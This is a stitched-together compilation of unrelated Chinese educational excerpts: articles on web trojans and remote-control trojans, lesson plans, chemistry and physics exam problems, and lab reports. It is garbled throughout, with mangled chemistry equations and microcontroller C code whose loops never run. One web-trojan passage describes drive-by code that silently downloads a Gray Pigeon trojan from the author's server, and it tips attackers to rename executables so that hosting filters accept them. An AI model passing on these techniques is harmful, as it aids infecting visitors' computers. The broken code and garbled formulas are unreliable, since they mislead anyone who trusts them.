Web安全之网页木马的检测与防御随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。在Web安全的攻击种类中,网页木马一直是一个不容忽视的问题。黑客把一个木马程序上传到一个网站里面然后用木马生成器生一个网马,再上到空间里面,再加代码使得木马在打开网页里运行,从而获取用户的隐私信息。随着网页木马破坏性的增大,人们对网页木马的重视程度也在逐渐增加。 1网页木马简介 1.1网页木马的定义 网页木马是在宏病毒、木马等恶意代码基础上发展出来的一种新形态的恶意代码.类似于宏病毒通过Word 等文档中的恶意宏命令实现攻击.网页木马一般通过HTML 页面中的一段恶意脚本达到在客户端下载、执行恶意可执行文件的目的,而整个攻击流程是一个“特洛伊木马式”的隐蔽的、用户无察觉的过程,因此,国内研究者通常称该种攻击方式为“网页木马”. 目前,学术界对网页木马尚无一个明确的、统一的定义.Wiki 将它定义为一种用户不知情的下载,发生的场景可以是用户阅览邮件、访问网站页面以及点击一个欺诈性的弹出框时,等等,该定义属于字面解释,包括的内容比较宽泛,如利用社会工程学手段欺骗用户下载也属于其涵盖范围.此外,Wiki 还用Drive-by-Install 这一术语来表示下载并安装恶意程序的过程;Google 的Provos 等人将网页木马限定为客户端在访问页面时受到攻击并导致恶意可执行文件的自动下载、执行,该定义指出了“访问页面时受到攻击”和“自动下载、自动执行恶意可执行文件”两个关键点;UCSB 的Cova 等人进一步指出,网页木马是以一段JavaScript 代码作为攻击向量的一种客户端攻击方式,而实际上,还存在一些通过CSS 元素、VBScript 脚本发起攻击的网页木马。 综上所述,网页木马定义为:一种以JavaScript,VBScript,CSS 等页面元素作为攻击向量,利用浏览器及插件中的漏洞,在客户端隐蔽地下载并执行恶意程序的基于Web 的客户端攻击。 1.2网页木马的攻击流程 网页木马采用一种被动攻击模式(即pull-based 模式):攻击者针对浏览器及插件的某个特定漏洞构造、部署好攻击页面之后,并不像发送垃圾邮件那样主动将内容推送给受害用户(即push-based 模式),而是被动地等待客户端发起的页面访问请求.其典型攻击流程如图 1 所示:1. 客户端访问攻击页面;2. 服务器做出响应,将页面内容返回给客户端;3. 页面被浏览器加载、渲染,页面中包含的攻击向量在浏览器中被执行并尝试进行漏洞利用;4,5. 存在该漏洞的客户端被攻破,进而下载、安装、执行恶意程序。
《夜晚的实验》教学设计 教材解析: 《夜晚的实验》是六年级下册第4 单元的一篇叙事性课文,讲述了意大利科学家斯帕拉捷通过夜晚的4 次实验,揭开了蝙蝠是依靠听觉来飞行的秘密,人们由此发现了超声波,并将超声波广泛应用于航空、航海、工业、农业、军事、医疗等领域。文章用浅显的语言介绍了斯帕拉捷的实验过程,用形象的比喻说明了蝙蝠如何利用超声波探路以及超声波的广泛用途,告诉孩子们任何有意义的发现都源于对生活的细心观察,认真实验。 设计思路: 遵循高年级学生学习语文的特点,采取“ 质疑式探究法” ,让学生自主发现问题,以问题为介,多次走进文本,层层深入,充分与文本对话,由表及里,实现三维目标的整合。 教学目标: 1 .学会本课4 个生字以及由生字组成的新词。 2 .理清记叙顺序,把握故事梗概。 3 .理解课文内容,知道任何有意义的发现都源于对生活的细心观察,认真实验。 重点难点: 1、指导学生正确、流利、有感情地朗读课文,复述课文。 2、感受科学家细心观察、善于思考、大胆实验、潜心研究、不断利用科学技术造福人类的科学精神。 教学流程: 一、激情入境,引入文本 1 .播放运用超声波来为飞机、轮船导航,超声波治病,超声波勘探的几组CAI 课件,让学生体会超声波的广泛用途。(“ 超声波” 这个词语对六年级的学生来说还是比较陌生的。通过课件的介绍,一方面让他们了解超声波的知识,另一方面也为学习课文设下悬念。) 2 .你们知道超声波是怎样被发现的吗?它缘于一位科学家的夜间实验。 3 .出示课题:《夜晚的实验》。 二、扣题生疑,走近文本 1 .看到这个题目,你有哪些疑问?( 此课题信息储藏量大,学生可能会提很多问题。如:谁做实验?为什么在夜晚做实验?怎样做实验?实验的结论是什么?它与超声波有何联系?等等。教师要及时梳理问题。) 2 .课题是文章的眼睛,我们要善于从这里发现问题,再带着这些问题读书,才是有目的的读,才会提高读的效率。让我们带着这些问题走进课文吧! (“ 学贵有疑” 。引导学生由课题生发开去,进行质疑问难,激活了学生的思维,使他们一开始就处于“ 愤”“ 悱” 的状态,激发了读书的欲望,也培养了自读能力。) 三、扫除障碍,走进文本 1 .自由朗读课文。 2 .学习生字,检查认读,读准后再写写。
中考化学实验题专题复习 (一)复习纲要 第一部分使用仪器和实验操作技能 第二部分气体的制取和物质的鉴别 1.气体制取 2.物质的鉴别
第三部分 几个重要实验 (二)解题指导 例1 实验室用铁、氧化铜、硫酸为原料制取铜,某同学设计了两个实验方案; A.Fe ??→?4 2SO H H 2??→?CuO Cu B.CuO ??→?4 2SO H CuSO 4?→? Fe Cu 两个实验方案中,最好的是 ,理由是 . 思路指导:实验设计应符合以下几个要求: 1.原理要符合客观事实 2.条件、步骤简单,所需仪器少. 3.制取成本低,既无药品损耗或损耗少. 4.副产品不污染环境或污染少. 根据以上要求判断: 最好的是B ,理由是:A 中制Fe 制H 2,再用H 2还原CuO ,有样品省耗,且反应条件需加热,消耗能源. 例2 用下列装置验证某混合气体一定含有H 2O 、CO 2、CO 、H 2四种气体(假若每步操作中,参加反应的气体都完全反应或吸收).要求验证过程中不得逸出有毒气体.
(1)验证CO2存在的操作是:将混合气体依次通过装置(填A、B、C、D、E,下同).确证CO2存在的现象是 . (2)验证H2O存在的操作是:将混合气体依次通过装置,确证H2O存在的现象是 . (3)某学生用下列操作来验证CO和H2:将混合气体依次通过→⑤、⑥接④、③接①、②接⑧、⑦接⑨.问该学生根据实验现象: ①能否验证H2存在,为什么? ②能否验证CO存在,为什么? 思路指导:实验室制备的气体一般含有一定的水蒸气和杂质,而通过水溶液除杂质得到的气体也带有一定的水蒸气.因此,除水一般在后,而鉴定水的存在在前,鉴定水一般用无水CuSO4.因此,要证明H2O、CO2、CO、H2的存在,其顺序应为:鉴定H2O→鉴定CO2→除CO2→除H2O→将H2、CO转化成CO2,H2O→鉴定H2O→鉴定CO2→尾气处理.则装置顺序为E→D→C→B→A→E→D→尾气处理,在洗气装置中要注意长导管进气,短导管出气,即“长进短出”. 解:1.D 石灰水变浑浊 2.E CuSO4由白变蓝 3.①不能因为反应过程中带入水蒸气干扰对H2的检验. ②能在排出CO2干扰后通过灼热CuO产生使澄清石灰水变浑浊的气体CO2证明了CO的存在. 【同步达纲练习】 一、选择题 1.量取15mL溶液时,最好选用下列哪种规格的量筒( ) A.10mL B.20mL C.50L D.100mL 2.下列各组中的气体,都可用NaOH固体进行干燥的是( ) A.H2、O2、N2 B.CO、CO2、SO2 C. H2、CO、O2 B.CO2、HCl、N2 3.洗涤附有不溶性碳酸盐的玻璃仪器时,正确的操作方法是( ) A.用自来水冲洗 B.用稀盐酸冲洗 C.用烧碱溶液冲洗 D.用稀盐酸溶解后,再用蒸馏水冲洗 4.将下列试剂分别滴入硝酸铜溶液、碳酸钠溶液和稀盐酸中,能观察到三种不同现象的是( ) A.氢氧化钠溶液 B.氢氧化钙溶液 C.硫酸钠溶液 D.氯化钾溶液
单片机原理实验报告 专业:计算机科学与技术 学号: :
实验1 计数显示器 【实验目的】 熟悉Proteus仿真软件,掌握单片机原理图的绘图方法 【实验容】 (1)熟悉Proteus仿真软件,了解软件的结构组成与功能 (2)学习ISIS模块的使用方法,学会设置图纸、选元件、画导线、修改属性等基本操作 (3)学会可执行文件加载及程序仿真运行方法 (4)理解Proteus在单片机开发中的作用,完成单片机电路原理图的绘制【实验步骤】 (1)观察Proteus软件的菜单、工具栏、对话框等基本结构 (2)在Proteus中绘制电路原理图,按照表A.1将元件添加到编辑环境中(3)在Proteus中加载程序,观察仿真结果,检测电路图绘制的正确性 表A.1
Switches&Relays BUT BUTTON 【实验原理图】 【实验源程序】 #include
for(;time<0;time--) for(k=200;k>0;k--) for(j=500;j<0;j--); } void init() { P0=buf[x1]; delay(10); P2=buf[x2]; delay(10); } void main() { init(); while(1) { x1=count/10; x2=count%10; P0=buf[x1]; delay(10);
化学实验训练题 一、性质型探究实验 【例1】草酸(乙二酸)存在于自然界的植物中,其K1=5.4×10-2,K2=5.4×10-5.草酸的钠盐和钾盐易溶于水,其钙盐难溶于水.草酸晶体(H2C2O4?2H2O)无色,熔点为101℃,易溶于水,受热脱水、升华,170℃以上分解.(1)甲组同学按照如图所示的装置,通过实验检验草酸晶体的分解产物, 装置C中可观察到的现象是;由此可知草酸 晶体分解的产物中有.装置B的主要作用 是; (2)乙组同学认为草酸晶体分解的产物中含有CO,为进行验证,选用甲组实验中的装置A、B和如图所示的部分装置(可以重复选用)进行实验. ①乙组同学的实验装置中,依次连 接的合理顺序为A、B、. 装置H反应管中盛有的物质 是;②能证明草酸晶体分解产物中有CO的现象是; (3)①设计实验证明: ①草酸的酸性比碳酸的强;②草酸为二元酸; ⑴有气泡产生,澄清石灰水变浑浊;CO2;冷凝(水蒸气和草酸),防止草酸进入装置C反应生成沉淀而干扰CO2的检验。 ⑵①F、D、G、H、D; CuO(氧化铜);②H前的装置D中的石灰水不变浑浊,H后的装置D中的石灰水变浑浊; ⑶①向1mol/L的NaHCO3溶液中加入1mol/L的草酸溶液,若产生大量气泡则说明草酸的酸性比碳酸强。②用NaOH标准溶液滴定草酸溶液,消耗NaOH的物质的量是草酸的2倍或将浓度均为0.1mol/L的草酸和氢氧化钠溶液等体积混合,测反应后的溶液的pH,若溶液呈酸性,则说明草酸是二元酸。 练习:1. 下图是实验室制备氯气并进行一系列相关实验的装置。 (1)制备氯气选用的药品为固体二氧化锰和浓盐酸,则相关的离子 反应方程式为; 装置B中饱和食盐水的作用是_________;同时装置B亦是安全瓶, 监测实验进行时C中是否发生堵塞,请写出发生堵塞时B中的现象; (2)装置C的实验目的是验证氯气是否具有漂白性,为此C中I、II、III依次放入; (3)设计装置D、E的目的是比较氯、溴、碘单质的氧化性强弱。当向D中缓缓通入少量氯气时,可以看到无色溶液逐渐变为__________色,说明;打开活塞,将装置D中少量溶液加入装置E中,振荡。观察到的现象是,该现象 (填“能”或“不能”)说明溴单质的氧化性强于碘,原因是。 (4)装置F中用足量的NaOH溶液吸收余氯,试写出相应的离子方程式;烧杯中的溶液不能选用下列中的。a.饱和NaOH溶液 b.饱和Ca(OH)2溶液c.饱和Na2SO3溶液d.饱和Na2CO3溶液(1)MnO2+4H++2Cl ̄Mn2++Cl2↑+ 2H2O;除去Cl2中的HCl; B中长颈漏斗中液面上升,形成水柱;(2)d; (3)黄;氯气的氧化性强于溴 E中溶液分为两层,上层(苯层)为紫红色; (4)2OH—+Cl2=Cl—+ClO—+H2O 不能过量的Cl2也可将I-氧化为I2 b 2. 易溶于水的三草酸合铁(Ⅲ)酸钾晶体K3[Fe(C2O4)3]·3H2O用于摄影和印刷。以铁屑为原料的制备流程如下:请回答下列问题:
高考押题专练 1.某同学通过下述实验验证力的平行四边形定则.实验步骤: ①将弹簧秤固定在贴有白纸的竖直木板上,使其轴线沿竖直方向. ②如图所示,将环形橡皮筋一端挂在弹簧秤的秤钩上,另一端用圆珠笔尖竖直向下拉,直到弹簧秤示数为某一设定值时,将橡皮筋两端的位置标记为O1、O2,记录弹簧秤的示数F,测量并记录O1、O2间的距离(即橡皮筋的长度l).每次将弹簧秤示数改变0.50 N,测出所对应的l,部分数据如下表所示: ③找出②中F=2.50 N时橡皮筋两端的位置,重新标记为O、O′,橡皮筋的拉力记为F O O′. ④在秤钩上涂抹少许润滑油,将橡皮筋搭在秤钩上,如图所示.用两圆珠笔尖成适当角度同时拉橡皮筋的两端,使秤钩的下端达到O点,将两笔尖的位置标记为A、B,橡皮筋OA段的拉力记为F OA,OB段的拉力记为F OB. 完成下列作图和填空: (1)利用表中数据在图坐标纸上画出Fl图线,根据图线求得l0=________cm. (2)测得OA=6.00 cm,OB=7.60 cm,则F OA的大小为________N. (3)根据给出的标度,在图中作出F OA和F OB的合力F′的图示.
(4)通过比较F′与________的大小和方向,即可得出实验结论. 【答案】(1)见解析图甲10.0(9.8、9.9、10.1均正确)(2)1.80(1.70~1.90均正确)(3)见解析图乙(4)F OO′ 【解析】(1)作出Fl图象,如图甲所示,求得直线的横截距即为l0,可得l0=10.0 cm (2)可计算橡皮筋的劲度系数 k=F Δx=2.5 0.05N/m=50 N/m 若OA=6.00 cm,OB=7.60 cm,则橡皮筋的弹力为 F1=kΔx1=50×(6.00+7.60-10.00)×10-2 N=1.80 N 则此时F OA=F1=1.80 N (3)F OB=F OA=1.80 N,两力的合力F′如图乙所示. (4)F OO′的作用效果和F OA、F OB两个力的作用效果相同,F′是F OA、F OB两个力的合力,所以通过比较F′和F OO′的大小和方向,可得出实验结论.
如果你访问××网站(国内某门户网站),你就会中灰鸽子木马。这是我一黑客朋友给我说的一句说。打开该网站的首页,经检查,我确实中了灰鸽子。怎么实现的呢?他说,他侵入了该网站的服务器并在网站主页上挂了网页木马;一些安全专家常说,不要打开陌生人发来的网址,为什么?因为该网址很有可能就是一些不怀好意者精心制作的网页木马。 以上只是网页木马的两种形式,实际上网页木马还可以挂在多媒体文件(RM、RMVB、WMV、WMA、Flash)、电子邮件、论坛等多种文件和场合上。很可怕吧,那么用户如何防范网页木马呢?下面我们就先从网页木马的攻击原理说起。 一、网页木马的攻击原理 首先明确,网页木马实际上是一个HTML网页,与其它网页不同的是该网页是黑客精心制作的,用户一旦访问了该网页就会中木马。为什么说是黑客精心制作的呢?因为嵌入在这个网页中的脚本恰如其分地利用了IE浏览器的漏洞,让IE在后台自动下载黑客放置在网络上的木马并运行(安装)这个木马,也就是说,这个网页能下载木马到本地并运行(安装)下载到本地电脑上的木马,整个过程都在后台运行,用户一旦打开这个网页,下载过程和运行(安装)过程就自动开始。 有朋友会说,打开一个网页,IE浏览器真的能自动下载程序和运行程序吗?如果IE真的能肆无忌惮地任意下载和运行程序,那天下还不大乱。实际上,为了安全,IE浏览器是禁止自动下载程序特别是运行程序的,但是,IE浏览器存在着一些已知和未知的漏洞,网页木马就是利用这些漏洞获得权限来下载程序和运行程序的。下面我举IE浏览器早期的一个漏洞来分别说明这两个问题。 ⒈自动下载程序 小提示:代码说明 a. 代码中“src”的属性为程序的网络地址,本例中 “https://www.doczj.com/doc/537905491.html,/1.exe”为我放置在自己Web服务器上的灰鸽子服务端安装程序,这段代码能让网页下载该程序到浏览它的电脑上。 b. 也可以把木马程序上传到免费的主页空间上去,但免费空间出于安全的考虑,多数不允许上传exe文件,黑客可能变通一下把扩展名exe改为bat或com,这样他们就可以把这些程序上传到服务器上了。 把这段代码插入到网页源代码的
计算机组成原理与汇编 实验报告 Company Document number:WUUT-WUUY-WBBGB-BWYTT-1982GT
计算机组成原理与汇编课程设计 实验报告 目录 一、课程设计目标 (3) 二、课程设计基本要求 (3) 三、课程设计的内容 (3) 四、课程设计的要求 (5) 五、实验详细设计 (5) 1.统计文件中各字母出现的频率 (5) 2.用递归计算50以内Fibonacci 数, 以十进制数输出 (9) 3.虚拟平台模拟机实验 (11) 六、使用说明 (19) 七、总结与心得体会 (19) 八、参考文献 (20) 九、附录 (20) 1.字符统计.asm (20) 2.斐波那契数(小于50).asm (29) 一、课程设计目标 通过课程设计使学生综合运用所学过的计算机原理与汇编知识,增强解决实际问题的能力,加深对所学知识的理解与掌握,提高软硬件开发水平,为今后打下基础。 课程设计的目的和要求: 1、使学生巩固和加强《计算机原理与汇编语言》课程的基本理论知识。
2、使学生掌握汇编语言程序设计的方法及编程技巧,正确编写程序。 3、使学生养成良好的编程习惯并掌握调试程序的基本方法。 4、使学生养成规范书写报告文档的能力,撰写课程设计总结报告。 5、通过查阅手册和文献资料,培养学生独立分析问题和解决问题的能力。 二、课程设计的基本要求 1、认真查阅资料,独立完成设计任务,每道题都必须上机通过。 2、编写预习报告,写好代码,上机调试。 3、独立思考,培养综合分析问题解决问题和调试程序的能力。 4、按时完成课程设计,写出课程设计报告。 三、课程设计的内容 1、给定一个英文ASCII码文件,统计文件中英文字母的频率,以十进制形式输出。 2、用递归计算50以内Fibonacci 数, 以十进制数输出. 3、虚拟平台的模型机实验,具体要求如下: 1)选择实验设备,将所需要的组件从组件列表中拖到实验设计流程栏中 2)搭建实验流程:根据原理图1和电路图(见附件),将已选择的组件进行连线。 3)输入机器指令:选择菜单中的“工具”,再选择“模型机调试”,在指令输入窗 口中输入如下指令: 00000000 00010000 00001001 00100000 00001011 00110000 00001011 01000000 00000000 00000001 本实验设计机器指令程序如下:
特洛伊木马 特洛伊木马(Trojan Horse)又称木马,是一种通过各种方法直接或者间接与远程计算机之间建立起连接,使远程计算机能够通过网络控制本地计算机的程序。这个名称来源于希腊神话《木马屠城记》。古希腊有大军围攻特洛伊城,久久无法攻下。于是有人献计制造一只高二丈的大木马,假装作战马神,让士兵藏匿于巨大的木马中,大部队假装撤退而将木马摈弃于特洛伊城下。城中得知解围的消息后,遂将“木马”作为奇异的战利品拖入城内,全城饮酒狂欢。到午夜时分,全城军民尽入梦乡,匿于木马中的将士开秘门游绳而下,开启城门及四处纵火,城外伏兵涌入,部队里应外合,焚屠特洛伊城。后世称这只大木马为“特洛伊木马”。如今黑客程序借用其名,有“一经潜入,后患无穷”之意。 通常木马并不被当成病毒,因为它们通常不包括感染程序,因而并不自我复制,只是靠欺骗获得传播。现在,随着网络的普及,木马程序的危害变得十分强大,概括起来,木马的危害有:窃取数据、接受非授权操作者的指令、篡改文件和数据、删除文件和数据、施放病毒、使系统自毁、远程运行程序、跟踪监视对方屏幕、直接屏幕鼠标控制,键盘输入控制、监视对方任务且可以中止对方任务、锁定鼠标键盘和屏幕、远程重启和关机、远程读取和修改注册表、共享被控制端的硬盘等。 远程控制概述。要了解木马,首先应了解远程控制。所谓远程控制,是指管理人员在异地通过计算机网络异地拨号或双方都接入Internet等手段,联通需被控制的计算机,将被控计算机的桌面环境显示到自己的计算机上,通过本地计算机对远方计算机进行配置、软件安装程序、修改等工作。这里的远程不是字面意思的远距离,一般指通过网络控制远端电脑。早期的远程控制往往指在局域网中的远程控制而言,随着互联网的普及和技术革新,现在的远程控制往往指互联网中的远程控制。当操作者使用主控端电脑控制被控端电脑时,就如同坐在被控端电脑的屏幕前一样,可以启动被控端电脑的应用程序,可以使用或窃取被控端电脑的文件资料,甚至可以利用被控端电脑的外部打印设备(打印机)和通信设备(调制解调器或者专线等)来进行打印和访问外网和内网,就像利用遥控器遥控电视的音量、变换频道或者开关电视机一样。不过,有一个概念需要明确,那就是主控端电脑只是将键盘和鼠标的指令传送给远程电脑,同时将被控端电脑的屏幕画面通过通信线路回传过来。也就是说,控制被控端电脑进行操作似乎是在眼前的电脑上进行的,实质是在远程的电脑中实现的,不论打开文件,还是上网浏览、下载等都是存储在远程的被控端电脑中的。远程控制必须通过网
( 语文教案 ) 学校:_________________________ 年级:_________________________ 教师:_________________________ 教案设计 / 精品文档 / 文字可改 六年级语文:12、夜晚的实验(教 学方案) Chinese is known as the "Mother of Encyclopedias", which is the best interpretation of it, so learning Chinese is very important.
六年级语文:12、夜晚的实验(教学方案) 教学目标:通过对课文的学习,了解科学家细心观察、善于思考、不断实验、潜心研究、利用科学技术造福人类的科学精神。教学重点:体会科学家的精神。教学准备:多媒体课件。教学过程:一、复习:通过上节课的学习,我们知道斯帕拉捷看到蝙蝠夜晚在天空灵活地飞来飞去,引起了他的好奇,谁能把他心中的问题说一说?(蝙蝠凭什么特殊的本领在夜空中自由地飞行呢?)过度:今天我们将围绕这个问题一起探索这个科学的奥秘。二、学习第一次实验:1、请一名学生起来读课文2-3节,其他学生思考,这一节斯帕拉捷是采用什么方法去探索这个科学奥秘的?结果怎么样?同时用笔在书上做做记号。2、学生思考,教师巡视。3、指名学生回答第一个问题。4、做一个表演,增强课堂情趣:指名一学生蒙上眼睛,突破障碍物。5、毫无疑问,如果蝙蝠像我们人一样,是用眼睛发现
障碍物,现在把它们的眼睛蒙上,他们会像某某某一样撞上障碍物。但实验的结果是怎么样的呢?指名学生起来回答第二个问题。6、这个结果让斯帕拉捷更加奇怪了,因为他从小就认为蝙蝠是靠眼睛来自由自在地飞翔的。他探索这个科学奥秘的兴趣更加强烈了,谁来把他心中的问题读一读。(指名读)过度:接下来,斯帕拉捷又将怎么去探索和发现呢?让我们接着跟他去做实验吧。三、学习其它几次实验:1、让学生自读课文,思考:接下来斯帕拉捷又做了几次实验?抓住其中一次实验,完成表格填空。 现象和问题 蝙蝠在夜空飞来飞去,从来不会撞到树上或者墙壁上 斯帕拉捷好奇:凭什么本领在夜空中自由自在飞行? 探 索
《数字图像处理》实验内容及要求 实验内容 一、灰度图像的快速傅立叶变换 1、 实验任务 对一幅灰度图像实现快速傅立叶变换(DFT ),得到并显示出其频谱图,观察图像傅立叶变换的一些重要性质。 2、 实验条件 微机一台、vc++6.0集成开发环境。 3、实验原理 傅立叶变换是一种常见的图像正交变换,通过变换可以减少图像数据的相关性,获取图像的整体特点,有利于用较少的数据量表示原始图像。 二维离散傅立叶变换的定义如下: 11 2( )00 (,)(,)ux vy M N j M N x y F u v f x y e π---+=== ∑∑ 傅立叶反变换为: 112( )00 1 (,)(,)ux vy M N j M N u v f x y F u v e MN π--+=== ∑∑ 式中变量u 、v 称为傅立叶变换的空间频率。图像大小为M ×N 。随着计算机技术和数字电路的迅速发展,离散傅立叶变换已经成为数字信号处理和
图像处理的一种重要手段。但是,离散傅立叶变换需要的计算量太大,运算时间长。库里和图基提出的快速傅立叶变换大大减少了计算量和存储空间,因此本实验利用快速傅立叶变换来得到一幅灰度图像的频谱图。 快速傅立叶变换的基本思路是把序列分解成若干短序列,并与系数矩阵元素巧妙结合起来计算离散傅立叶变换。若按照奇偶序列将X(n)进行划分,设: ()(2) ()(21)g n x n h n x n =??=+? (n=0,1,2,…,12N -) 则一维傅立叶变换可以改写成下面的形式: 1 0()()N mn N n X m x n W -==∑ 11220 ()()N N mn mn N N n n g n W h n W --===+∑∑ 1122(2)(21) (2)(21)N N m n m n N N n n x n W x n W --+===++∑∑
2014中考物理《力学实验探究专题》 实验一 密度的测量 1、(2013年福州市)(8分)在“测酸奶密度”的实验中, (1)小明的实验方案:用天平和量筒测密度。 ①他用已调节好的天平测得空烧杯的质量m 0为37.4 g ;接着把酸奶倒人烧杯中,测得烧杯和酸奶的总质量m 1,如图24所示m 1=________g ;然后把烧杯中的酸奶倒人量筒中,如图25所示,V 奶=________cm 3;则酸奶的密度ρ=________g /cm 3。 ②在交流讨论中,小雨同学认为小明测得的酸奶密度值__ (偏小或偏大)。其原因是________________________________ (2)小雨的实验方案:巧妙地利用天平、小玻璃瓶(有盖)和水测酸奶密度。 请你简要写出小雨的实验过程和酸奶密度的计算表达式(用测量的物理量符号表示)。 (2)实验过程: ①用天平测出小玻璃瓶(含盖)的质量m 0; ②在瓶内装满水,盖上盖子,用天平测出瓶和水的总质量m 1; ③________________________________ 酸奶密度的计算表达式:ρ奶= 2、(山东省菏泽市2013年)(6分)小明用利用托盘天平和量筒测量老醋的密度。 (1)调节天平时,游码移至左端,发现指针静止时指在分度盘中央刻度线的右侧,要使 天平平衡,他应该( ) A .把横梁右端螺母向右旋出一些 B .把横梁右端螺母向左旋进一些 C .把天平右盘的砝码减少一些 D .向右移动游码 (2)当天平平衡后,小明开始测量:测量步骤如图12所示,正确的操作顺序是: (填字母代号)。 A .用天平测量烧杯和剩余老醋的总质量; B .将待测老醋倒入烧杯中,用天平测出烧杯和老醋的总质量; C .将烧杯中老醋的一部分倒入量筒,测出这部分老醋的体积; (3)根据图中数据计算可得:老醋的密度是 ㎏/m 3。 C A B